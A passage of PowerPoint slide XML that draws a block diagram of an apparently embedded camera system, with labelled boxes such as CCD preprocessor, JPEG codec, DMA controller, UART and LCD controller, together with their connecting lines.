            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1835" y="1849"/>
              <a:ext cx="2170" cy="490"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 6"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1197" y="1862"/>
              <a:ext cx="6992" cy="4039"/>
              <a:chOff x="1248" y="2179"/>
              <a:chExt cx="6992" cy="4039"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29703" name="Rectangle 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2099" y="2275"/>
                <a:ext cx="6126" cy="3865"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29704" name="Rectangle 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1949" y="2179"/>
                <a:ext cx="6176" cy="3893"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="2800"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29705" name="Rectangle 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4209" y="3787"/>
                <a:ext cx="1576" cy="403"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Microcontroller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29706" name="Rectangle 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3058" y="2733"/>
                <a:ext cx="1809" cy="403"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>CCD preprocessor</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29707" name="Rectangle 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5206" y="2733"/>
                <a:ext cx="172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Pixel coprocessor</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29708" name="Rectangle 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2131" y="2899"/>
                <a:ext cx="576"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A2D</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29709" name="Rectangle 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7334" y="2733"/>
                <a:ext cx="563" cy="41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D2A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29710" name="Rectangle 14"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2040" y="3787"/>
                <a:ext cx="1428"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JPEG codec</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29711" name="Rectangle 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2060" y="4436"/>
                <a:ext cx="1831" cy="402"/>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DMA controller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29712" name="Rectangle 16"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2060" y="5490"/>
                <a:ext cx="1818"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Memory controller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29713" name="Rectangle 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="5490"/>
                <a:ext cx="1702"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ISA bus interface</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29714" name="Rectangle 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5834" y="5490"/>
                <a:ext cx="89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UART</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29715" name="Rectangle 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6900" y="5490"/>
                <a:ext cx="997"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LCD ctrl</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29716" name="Rectangle 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6650" y="4436"/>
                <a:ext cx="1247" cy="402"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Display ctrl</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29717" name="Rectangle 21"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6183" y="3787"/>
                <a:ext cx="171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Multiplier/Accum</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29718" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2810" y="3470"/>
                <a:ext cx="4810" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4810"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 4810 w 4810"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 4810"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 4810 w 4810"/>
                  <a:gd name="T9" fmla="*/ 1 h 1"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="4810" h="1">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4810" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29719" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2809" y="5160"/>
                <a:ext cx="4411" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4411"/>
                  <a:gd name="T1" fmla="*/ 4 h 4"/>
                  <a:gd name="T2" fmla="*/ 4411 w 4411"/>
                  <a:gd name="T3" fmla="*/ 0 h 4"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 4411"/>
                  <a:gd name="T7" fmla="*/ 0 h 4"/>
                  <a:gd name="T8" fmla="*/ 4411 w 4411"/>
                  <a:gd name="T9" fmla="*/ 4 h 4"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="4411" h="4">
                    <a:moveTo>
                      <a:pt x="0" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4411" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 24"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4838" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="9915" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29786" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994" y="11925"/>
                  <a:ext cx="1" cy="33"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29787" name="Freeform 26"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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8" name="Freeform 27"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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5" name="Group 28"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6212" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="11499" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29783" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11578" y="11925"/>
                  <a:ext cx="1" cy="33"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29784" name="Freeform 30"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11502"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5" name="Freeform 31"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11499"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6" name="Group 32"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2999" y="5895"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="7666" y="11780"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29780" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7745" y="11925"/>
                  <a:ext cx="1" cy="33"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29781" name="Freeform 34"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7669"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2" name="Freeform 35"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7666"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7" name="Group 36"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="7417" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29777" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7496" y="11194"/>
                  <a:ext cx="1" cy="36"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29778" name="Freeform 38"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7419" y="11049"/>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w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29779" name="Freeform 39"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7417" y="11225"/>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w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="8" name="Group 40"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7147" y="4841"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="12414" y="10726"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29774" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12493" y="10871"/>
                  <a:ext cx="1" cy="33"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29775" name="Freeform 42"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12416" y="10726"/>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76" name="Freeform 43"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12414" y="10900"/>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w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9" name="Group 44"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7344" y="4841"/>
                <a:ext cx="156" cy="649"/>
                <a:chOff x="12831" y="10726"/>
                <a:chExt cx="156" cy="649"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29772" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12910" y="10726"/>
                  <a:ext cx="1" cy="504"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29773" name="Freeform 46"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12831"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0" name="Group 47"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4848" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="9915" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29769" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994" y="11194"/>
                  <a:ext cx="1" cy="36"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29770" name="Freeform 49"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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71" name="Freeform 50"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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1" name="Group 51"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6222" y="5164"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="11499" y="11049"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29766" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11578" y="11194"/>
                  <a:ext cx="1" cy="36"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29767" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
